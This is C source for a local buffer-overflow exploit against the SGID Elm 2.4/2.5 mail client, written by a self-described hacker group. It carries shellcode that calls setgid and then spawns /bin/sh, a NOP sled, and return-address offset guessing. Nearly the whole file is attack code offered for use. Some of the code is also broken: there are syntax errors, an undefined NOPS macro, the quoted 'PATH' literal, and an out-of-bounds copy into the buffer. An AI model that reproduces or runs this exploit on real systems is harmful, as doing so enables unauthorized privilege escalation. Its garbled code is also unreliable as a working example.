/* Linux Elm 2.4/2.5 local exploit by slash / buffer0verfl0w security This will give you a shell(gid=12) if /usr/bin/elm is SGID. Since there isn't a single persone who didn't code one of these elm exploits I decided to code mah own :) This was tested on slackware 4.0 and redhat 5.1. Offset on slackware -500. So...beware, yet another elm exploit. Shoutouts go to b0f, TESO, ADM, mdma, zsh, FunkySh and all of the people who know me. Disslikes go out to you-know-who: p4riah and h0lmez. Peace out, -- slash - tcsh@b0f.i-p.com - b0f.freebsd.lublin.pl */ #include #include #define NOP 0x90 /* no operation skip to next instruction */ #define LEN 264 /* our buffersize */ #define PATH "/usr/bin/elm" /* path to the program */ #define OFFSET -500 /* default offset */ char shellcode[]= /* setgid(12); execve("/bin/sh"); */ "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76\x08\x31\xc0\x88" "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb" "\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01"; long esp(void){ __asm__("movl %esp,%eax"); } int main(int argc,char **argv){ char buffer[LEN]; int i,offset; long retaddr; printf("Linux Elm 2.4/2.5 local exploit\n"); printf("coded by slash / buffer0verfl0w security\n"); printf(" \n"); if(argc > 1){ offset = atoi(argv[1]); } else{ offset = OFFSET; } /*setting up the ret address*/ retaddr=(esp()-offset); printf("Using Offset: %d.", offset); printf("Using return address: 0x%lx", retaddr); printf("After this run \"reset\"to reset the terminal*"); for( i = 0; i < LEN; i + = 4){ *(long *)&buffer[i] = retaddr;} /* thanx for the tip {} */ memset(buffer, NOPS, 260 - strlen(shellcode)); /*copying the shellcode into the buffer*/ memcpy( buffer + i, shellcode, strlen(shellcode)); /*executing the program*/ execlp("PATH", "elm", "-f", buffer,0); return 0; }